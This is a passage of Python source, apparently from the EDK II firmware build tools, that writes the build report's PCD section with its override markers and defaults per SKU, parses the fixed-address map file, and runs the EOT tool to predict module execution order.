PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in struct.items():
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
if HasDscOverride == True:
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
if DecMatch and IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = OverrideValues.keys()
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for _, Values in OverrideStruct.items():
for Key,value in Values.items():
if value[1] and value[1].endswith('.dsc'):
OverrideFieldStruct[Key] = value
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
RealEntryPoint = "_ModuleEntryPoint"
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
# Invokes EOT tool to get the predicted the execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = open(SourceList, "w+")
for Item in self._SourceList:
FileWrite(TempFile, Item)
TempFile.close()
TempFile = open(GuidList, "w+")
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
TempFile.close()
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
